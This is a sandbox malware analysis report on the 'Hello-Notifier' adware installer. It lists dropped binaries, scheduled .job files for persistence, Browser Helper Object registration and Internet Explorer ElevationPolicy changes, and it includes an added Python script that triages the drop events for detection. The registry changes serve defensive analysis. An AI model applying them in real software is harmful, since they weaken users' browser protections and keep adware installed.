Malware Analysis Report

2025-03-15 04:26

Sample ID: 241025-18cq6swhqm
Target: 1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N
SHA256: 1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25
Tags: adware discovery evasion persistence privilege_escalation spyware stealer upx
Score: 9/10

Table of Contents

Analysis Overview
MITRE ATT&CK (Enterprise Matrix V15)
Analysis: static1 (Detonation Overview, Signatures)
Analysis: behavioral1, behavioral4, behavioral5, behavioral2, behavioral3, behavioral6, behavioral7, behavioral8 (each with Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

Score: 9/10
SHA256: 1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25
Threat Level: Likely malicious

The file 1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N was found to be: Likely malicious.

Malicious Activity Summary

Tags: adware discovery evasion persistence privilege_escalation spyware stealer upx

Checks for common network interception software
Loads dropped DLL
Reads user/profile data of web browsers
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
ACProtect 1.3x - 1.4x DLL software
Installs/modifies Browser Helper Object
Checks installed software on the system
UPX packed file
Drops file in Program Files directory
Drops file in Windows directory
Program crash
Enumerates physical storage devices
Unsigned PE
System Location Discovery: System Language Discovery
NSIS installer
System policy modification
Suspicious use of WriteProcessMemory
Modifies registry class
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses


Analysis: static1

Detonation Overview

Reported: 2024-10-25 22:18

Signatures

Unsigned PE

NSIS installer

installer

Analysis: behavioral1

Detonation Overview

Submitted: 2024-10-25 22:18
Reported: 2024-10-25 22:21
Platform: win7-20241010-en
Max time kernel: 51s
Max time network: 57s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe"

Signatures

Checks for common network interception software

evasion

ACProtect 1.3x - 1.4x DLL software

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Loads dropped DLL

Process (number of dropped-DLL load events; the DLL names were not captured in this report)
C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe (4)
C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe (60)

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Installs/modifies Browser Helper Object

stealer adware
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\ = "CrossriderApp0037928" C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\NoExplorer = "1" C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\ = "CrossriderApp0037928" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\NoExplorer = "1" C:\Windows\SysWOW64\regsvr32.exe N/A

UPX packed file

upx

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Uninstall.exe C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-helper.exe C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-buttonutil.exe C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-buttonutil.dll C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier.ico C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\background.html C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-updater.exe C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\37928.xpi C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Installer.log C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-buttonutil64.exe C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-buttonutil64.dll C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho.dll C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho64.dll C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\utils.exe C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Hello-Notifier-codedownloader.job C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File opened for modification C:\Windows\Tasks\Hello-Notifier-codedownloader.job C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Windows\Tasks\temp_Hello-Notifier-enabler.job C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Windows\Tasks\Hello-Notifier-updater.job C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File opened for modification C:\Windows\Tasks\Hello-Notifier-firefoxinstaller.job C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Windows\Tasks\Hello-Notifier-enabler.job C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File opened for modification C:\Windows\Tasks\Hello-Notifier-enabler.job C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File opened for modification C:\Windows\Tasks\temp_Hello-Notifier-enabler.job C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File opened for modification C:\Windows\Tasks\Hello-Notifier-updater.job C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Windows\Tasks\Hello-Notifier-firefoxinstaller.job C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
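The two drop tables above show the installer's unpacked helper (Ewfmukuhwkg.exe, running from the NSIS temporary plugin directory) writing the Hello-Notifier binaries into Program Files and a set of .job files into C:\Windows\Tasks, the job store of the legacy Task Scheduler 1.0 interface, which is how the adware survives a reboot. The Python below is an added example, not part of this report or of any tool it references: it parses a subset of those rows (copied from the tables above), attributes each write to its process, flags job-store writes, and links every job to the dropped executable whose name it shares. The job-to-executable link and the NSIS temp-directory pattern (`%TEMP%\ns<letter><hex>.tmp`) are heuristics of this example; the report does not show the command line stored inside each .job file.

```python
"""Triage of sandbox file-drop events (added example, not part of the report).

Parses "File created" / "File opened for modification" rows, attributes each
write to its process, flags writes into the legacy Task Scheduler job store
and links every .job file to a dropped executable with the same name stem.
"""
import re
from collections import defaultdict

# Constructed input: a subset of the rows from the two drop tables above.
SAMPLE_ROWS = r"""
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-updater.exe C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho.dll C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\background.html C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\37928.xpi C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Windows\Tasks\Hello-Notifier-codedownloader.job C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File opened for modification C:\Windows\Tasks\Hello-Notifier-codedownloader.job C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Windows\Tasks\temp_Hello-Notifier-enabler.job C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Windows\Tasks\Hello-Notifier-updater.job C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Windows\Tasks\Hello-Notifier-enabler.job C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
File created C:\Windows\Tasks\Hello-Notifier-firefoxinstaller.job C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
""".strip().splitlines()

# Row layout of the report: <action> <target path> <writing process> <target column, N/A here>.
# Both paths may contain spaces, so the process path is located by its drive-letter prefix.
ROW_RE = re.compile(
    r"^(?P<action>File created|File opened for modification)\s+"
    r"(?P<target>[A-Za-z]:\\.+?)\s+"
    r"(?P<process>[A-Za-z]:\\.+?)\s+N/A$"
)
JOB_STORE = "c:\\windows\\tasks\\"  # Task Scheduler 1.0 .job files, still honoured on Windows 7
# Heuristic: NSIS unpacks plugins and helper binaries into %TEMP%\ns<letter><4 hex>.tmp ($PLUGINSDIR).
NSIS_PLUGINDIR_RE = re.compile(r"\\temp\\ns[a-z]?[0-9a-f]{4}\.tmp\\", re.IGNORECASE)


def parse_rows(rows):
    """Return (action, target, process) tuples; rows that do not fit the layout are skipped."""
    events = []
    for row in rows:
        m = ROW_RE.match(row.strip())
        if m:
            events.append((m["action"], m["target"], m["process"]))
    return events


def triage(events):
    created = defaultdict(list)  # writing process -> files it created
    jobs = {}                    # job name (without .job) -> path in the job store
    for action, target, process in events:
        if action == "File created":
            created[process].append(target)
        low = target.lower()
        if low.startswith(JOB_STORE) and low.endswith(".job"):
            jobs[target.rsplit("\\", 1)[1][:-4]] = target

    pe_drops = sorted(p for paths in created.values() for p in paths
                      if p.lower().endswith((".exe", ".dll")))
    # Heuristic link: the report does not show the command inside each .job, but every
    # job name (minus a "temp_" prefix) matches the name of a dropped executable.
    exe_by_stem = {p.rsplit("\\", 1)[1][:-4].lower(): p
                   for p in pe_drops if p.lower().endswith(".exe")}
    job_to_exe = {}
    for job in jobs:
        stem = job[5:] if job.lower().startswith("temp_") else job
        if stem.lower() in exe_by_stem:
            job_to_exe[job] = exe_by_stem[stem.lower()]

    return {
        "jobs": sorted(jobs),
        "pe_drops": pe_drops,
        "job_to_exe": job_to_exe,
        # Processes writing from an NSIS plugin directory: the installer's unpacked helper stage.
        "nsis_temp_writers": sorted(p for p in created if NSIS_PLUGINDIR_RE.search(p)),
    }


if __name__ == "__main__":
    for key, value in triage(parse_rows(SAMPLE_ROWS)).items():
        print(f"{key}:")
        for item in (value.items() if isinstance(value, dict) else value):
            print("   ", item)
```

Run against the full tables rather than this subset, the same code links all five .job files (the "temp_" job included) to executables dropped seconds earlier by a process living in an NSIS temp directory, which is the combination worth alerting on: a legacy job-store write by a short-lived installer stage.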

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A

NSIS installer

installer

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\Hello-Notifier-bg.exe = "8000" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{660BF2E7-F3CE-43D3-96E9-51F45E4EE215} C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0} C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\AppName = "Hello-Notifier-buttonutil64.exe" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A71C09BB-8724-4A9B-B93E-74A8D2DCE38A} C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppName = "Hello-Notifier-codedownloader.exe" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\AppName = "Hello-Notifier-helper.exe" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppName = "Hello-Notifier-bg.exe" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A71C09BB-8724-4A9B-B93E-74A8D2DCE38A}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\AppName = "Hello-Notifier-helper.exe" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY\DefaultValue = "PMIL" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89} C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4} C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppName = "Hello-Notifier-buttonutil.exe" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{660BF2E7-F3CE-43D3-96E9-51F45E4EE215}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{65021441-ED41-4725-8921-AF5CACAE92F6}\Policy = "3" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\Policy = "1" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{65021441-ED41-4725-8921-AF5CACAE92F6}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0} C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY\CheckedValue = "PMIL" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppName = "Hello-Notifier-buttonutil.exe" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89} C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5EFA9B9B-8BA5-4DD0-AA9F-7802DC493E}\Policy = "3" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Approved Extensions C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
